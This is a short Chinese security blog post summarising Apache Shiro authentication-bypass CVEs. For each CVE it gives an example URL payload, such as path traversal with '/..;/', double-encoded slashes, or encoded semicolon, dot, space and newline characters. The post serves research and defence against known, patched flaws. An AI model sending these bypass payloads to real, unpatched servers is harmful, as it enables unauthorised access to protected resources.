Ywc's blog

shiro 权限绕过系列汇总

漏洞
Word count: 286Reading time: 1 min
2022/01/13

权限绕过原理

配置shiroConfig-Filter里的URL是ant格式,路径支持通配符表示。具体逻辑在AntPathMatcher#doMatch

1
2
3
?:匹配一个字符
*:匹配零个或多个字符串
**:匹配路径中的零个或多个路径

payload总结

总结

  • CVE-2016-6802 在访问路径前加上/任意目录名/../,即可绕过访问

  • CVE-2020-1957 /demo/..;/admin/index,其中demo为授权路径,admin/index为鉴权路径 /.;/hello/aaaa

  • CVE-2020-11989 admin/page%252fABCDEFG其中admin/page为鉴权路径,ABCDEFG为随意字符串 /hello/a%25%32%66a /;/test/hello/aaa

  • CVE-2020-13933 admin/%3BABCDEFG,其中admin为鉴权路径,ABCDEFG为随意字符串

  • CVE-2020-17510 admin/%2e

  • CVE-2020-17523 admin/%20,其中admin为鉴权路径

  • CVE-2022-32532 特定条件下的漏洞利用:当shiro使用了RegExPatternMatcher进行路由匹配时,由于Java的正则Pattern.matches解析.默认是不匹配r或者n的,因此当path中带有%0a时可绕过正则匹配 /permit/a%0any

四个CVE分析

Reference

Author:V1ZkRA

Link:https://yinwc.github.io/2022/01/13/shiro-%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E7%B3%BB%E5%88%97%E6%B1%87%E6%80%BB/

Publish date:January 13th 2022, 3:18:58 pm

Update date:April 21st 2023, 2:33:44 pm

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 权限绕过原理
  2. 2. payload总结
    1. 2.1. 总结
  3. 3. 四个CVE分析
  4. 4. Reference
Total : 131
2023
2022
2021
2020
2019
2018
CTF 企业安全 learn python 漏洞 安全评估 前端安全 安全开发 代码审计 SRC problem 渗透测试 Crypto 应急响应 云安全 SCA
blog 漏洞 learn